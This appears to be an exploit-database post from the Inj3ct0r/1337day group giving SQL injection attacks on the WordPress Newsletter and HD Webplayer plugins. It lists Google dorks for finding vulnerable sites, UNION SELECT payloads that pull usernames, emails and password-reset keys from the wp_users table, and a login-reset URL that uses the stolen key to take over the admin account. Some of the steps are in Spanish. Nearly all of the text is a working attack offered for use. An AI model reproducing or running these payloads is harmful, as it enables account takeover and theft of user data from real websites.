
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0
_
__
__
__
1
1 /' \
__ /'__`\
/\ \__ /'__`\
0
0 /\_, \
___ /\_\/\_\ \ \
___\ \ ,_\/\ \/\ \ _ ___
1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\
0
0
\ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/
1
1
\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\
0
0
\/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/
1
1
\ \____/ >> Exploit database separated by exploit 0
0
\/___/
type (local, remote, DoS, etc.)
1
1
1
0 [+] Site
: 1337day.com
0
1 [+] Support e-mail : submit[at]1337day.com
1
0
0
1
#########################################
1
0
I'm DaOne member from Inj3ct0r Team
1
1
#########################################
0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: WordPress plugins Newsletter SQL Injection Vulnerability
# Date: 2013-02-04
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://www.satollo.net/plugins/newsletter
# Category: webapps/php
# Version: 3.x
# Google dork: inurl:wp-content/plugins/newsletter/do/subscribe.php
##########################################
- Exploit (injection point: the `id` query parameter of view.php):
http://{host}/wp-content/plugins/newsletter/do/view.php?id=99 {SQL}
Comando 1.
union select 1,2,concat(user_login,0x3c2d3e,user_email),4,5,6,7,8,9,10,11,12,13,
14,15,16,17,18,19,20,21 from wp_users
Comando 2.
union select 1,2,concat(user_login,0x3c2d3e,user_activation_key),4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21 from wp_users
Comando 3.
wp-login.php?action=rp&key=KEY&login=admin

================================================================================
===============
=
SQL Injection: WordPress HD Webplayer Version 1.1
=
=
=
================================================================================
===============
METODO 1 "Dork's"
================================================================================
===============
#DORK 1

inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=
#DORK 2
HD_Webplayer_Commercial_Key logo.jpg topleft 50 http
================================================================================
===============
METODO 2 "Dork's"
================================================================================
===============
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
================================================================================
===============
METODO 1
================================================================================
===============
1 : playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_logi
n,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11+from
+wp_users (este se coloca luego del "hd-webplayer" del Dork 1)
================================================================================
===============
2 : /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_k
ey,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users (este se usa para recuperar la clav
e de activacion, se coloca en el panel del admin OLVIDE CLAVE y poner el mail qu
e obtuvimos luego colocar este dork a partir del + que esta en la URL)
================================================================================
===============
3 : wp-login.php?action=rp&key=KEY&login=admin (aqui convinar la KEY y el user q
ue obtuvimos)
================================================================================
===============
METODO 2
================================================================================
===============
1 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoi
d=-3 UNION SELECT 1,2,3,group_concat
(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users-================================================================================
===============
2 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoi
d=-3 UNION SELECT 1,2,3,group_concat
(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users-================================================================================
===============
3 : wp-login.php?action=rp&key=KEY&login=admin
================================================================================
===============
